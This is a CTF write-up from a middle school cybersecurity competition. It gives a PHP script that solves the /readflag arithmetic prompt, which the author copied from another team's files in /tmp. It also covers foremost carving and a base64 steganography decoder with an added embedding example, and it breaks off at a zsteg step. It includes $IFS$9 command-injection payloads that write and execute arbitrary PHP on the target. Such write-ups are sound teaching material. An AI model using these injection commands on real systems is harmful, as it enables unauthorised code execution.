[3rd National Middle School Students' Cybersecurity Competition, Preliminary Round] WriteUp (2)

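In this challenge, /readflag roughly works like this: you enter y, and then you have to solve an addition. While I was debugging it step by step, I noticed that first blood had already been taken, so I looked in the /tmp directory. It was a bit of a free ride: there happened to be an exp in /tmp, and I quickly saved a copy: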

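<?php
// Descriptors for the child process: stdin (0) and stdout (1) as pipes.
$d = array();
$d[0] = array("pipe", "r");
$d[1] = array("pipe", "w");
$pr = proc_open("/readflag", $d, $pipes);
// Answer the initial prompt.
fwrite($pipes[0], "y\n");
$op1 = '';
$op2 = '';
$inop = false;
// Read stdout one byte at a time: digits before '+' go to $op1,
// digits after it go to $op2, and '=' ends the expression.
while (1) {
    $ch = stream_get_contents($pipes[1], 1);
    echo $ch;
    if ($ch == "+") {
        $inop = true;
    }
    if ($ch == "=") {
        break;
    }
    if (is_numeric($ch)) {
        if ($inop) {
            $op2 .= $ch;
        } else {
            $op1 .= $ch;
        }
    }
}
// Send the sum back, then print whatever /readflag outputs next.
fwrite($pipes[0], (intval($op1) + intval($op2)) . "\n");
echo stream_get_contents($pipes[1]);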

Construct a command that writes a file, with this exp base64-encoded:

php$IFS$9-r$IFS$9'file_put_contents("/tmp/1.php",base64_decode("<base64 of the exp>"));'

This writes the exp into the file /tmp/1.php, which is then executed with the php command:

php$IFS$9/tmp/1.php

This gives the flag.

Misc

Sign-in challenge

foremost can be used to carve out a QR code image.

Scanning it gives the flag.

Avicii

The text in 1.txt is base64 steganography; I found a script online:

import base64
BASE64_CHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
def get_base64_diff_value(s1, s2):
    # Alphabet-index difference at the first character where the stego line
    # and its canonical re-encoding differ (0 if the lines are identical).
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(BASE64_CHARS.index(s1[i]) - BASE64_CHARS.index(s2[i]))
    return 0
def goflag(bin_str):
    # Regroup the collected bit string into 8-bit characters.
    res_str = ''
    for i in range(0, len(bin_str), 8):
        res_str += chr(int(bin_str[i:i + 8], 2))
    return res_str
def solve_stego():
    with open('1.txt', 'r') as f:
        file_lines = f.readlines()
    bin_str = ''
    for line in file_lines:
        steg_line = line.replace('\n', '')
        # Decode and re-encode to get the canonical form of the same data.
        norm_line = base64.b64encode(base64.b64decode(steg_line)).decode()
        diff = get_base64_diff_value(steg_line, norm_line)
        print(diff)
        # Each '=' of padding leaves 2 spare bits in the last data character.
        pads_num = steg_line.count('=')
        if diff:
            bin_str += bin(diff)[2:].zfill(pads_num * 2)
        else:
            bin_str += '0' * pads_num * 2
    print(goflag(bin_str))
if __name__ == '__main__':
    solve_stego()

Running it on the contents of 1.txt gives the key: doveee
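Where those hidden bits sit, shown from the embedding side as an added example (not part of the original post or of the script above): a base64 line ending in `=` or `==` has 2 or 4 unused low bits in its last data character, so a payload can ride there without changing the decoded bytes, and a decode/re-encode comparison flags such lines. The function names, `COVER` and `SECRET` are constructed for illustration.

```python
import base64

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Constructed sample data: nine 13-byte cover lines, each encoding with "==".
COVER = [b"cover line %d." % i for i in range(9)]
SECRET = b"demo"

def spare_bits(line):
    """Unused low bits in the last data character: 2 per '=' of padding."""
    return 2 * (len(line) - len(line.rstrip("=")))

def embed(cover_chunks, secret):
    """Base64-encode each chunk, hiding the secret's bits in the spare bits."""
    bits = "".join(f"{b:08b}" for b in secret)
    out = []
    for chunk in cover_chunks:
        line = base64.b64encode(chunk).decode()
        n = spare_bits(line)
        if n and bits:
            take, bits = bits[:n].ljust(n, "0"), bits[n:]
            body = line.rstrip("=")
            last = ALPHABET.index(body[-1]) | int(take, 2)
            line = body[:-1] + ALPHABET[last] + "=" * (n // 2)
        out.append(line)
    if bits:
        raise ValueError("cover text has too little padding capacity")
    return out

def is_canonical(line):
    """True if the line equals the re-encoding of its own decoded bytes."""
    return base64.b64encode(base64.b64decode(line)).decode() == line

def extract(lines):
    """Collect the spare bits of every padded line and regroup into bytes."""
    bits = ""
    for line in lines:
        n = spare_bits(line)
        if n:
            last = ALPHABET.index(line.rstrip("=")[-1])
            bits += f"{last & ((1 << n) - 1):0{n}b}"
    usable = len(bits) - len(bits) % 8  # drop an incomplete trailing byte
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))

if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    for line in stego:
        print(line, "canonical" if is_canonical(line) else "NON-CANONICAL")
    print(extract(stego))
```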

Then look at 2.png with zsteg to get the hidden text:
